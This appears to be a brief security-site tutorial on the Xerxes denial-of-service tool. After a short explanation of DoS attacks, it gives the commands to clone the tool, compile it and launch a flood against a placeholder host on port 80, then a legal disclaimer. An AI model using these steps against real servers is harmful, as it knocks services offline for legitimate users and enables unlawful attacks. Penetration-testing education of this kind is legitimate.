Home Exploitation Tools XERXES – Penetration Testing with the Most Powerful Tool For DoS...

XERXES – Penetration Testing with the Most Powerful Tool For DoS Attack using Kali Linux

In this Kali Linux Tutorial, we show you how to use Xerxes in launching a DOS attack. DDOS tools are capable of putting heavy loads on HTTP servers and bringing them to their knees by exhausting their resources.

What is a DOS attack?

Type of attack which floods servers or networks which results in making the source inaccessible for the legitimate users.

Recently hackers introduced a new pattern of DDOS attacks named Pulse Wave which is capable of pinning down Multiple targets, Pulse Wave doesn’t have a ramp-up period like a classic DDoS attack all the sources are committed once and continued over its duration.

Also Read Inviteflood- Tool Used to Perform DOS Attack on VOIP Network

Also, the Mirai bot which is used in targeting a College in the US, lasts for more than 54 Hours continuously and researchers believe it is a new variant of Mirai, one that is “more adept at launching application layer assaults.”

Xerxes – Kali Linux Tutorial

This tool was committed on Github by zanyarjamal, it is one of the simple and most powerful DOS tools. To clone the tool from Github.

git clone https://github.com/zanyarjamal/xerxes.git

Then navigate to the cloned folder.

cd xerxes

Next, You Should compile with GNU GCC compiler

gcc xerxes.c -o xerxes

To launch the attack

./xerxes example.com 80

Kali Linux Tutorial
You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.


This article is only for an Educational purpose. Any actions and or activities related to the material contained on this Website is solely your responsibility.  Misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Also, Read

10 Best Vulnerability Scanner Tools For Penetration Testing – 2023

Cloud Penetration Testing Checklist – 2023

50+ Network Penetration Testing Tools for Hackers & Security Professionals – 2023

Guru is an Ex-Security Engineer at Comodo Cybersecurity. Co-Founder - Cyber Security News & GBHackers On Security.



Please enter your comment!
Please enter your name here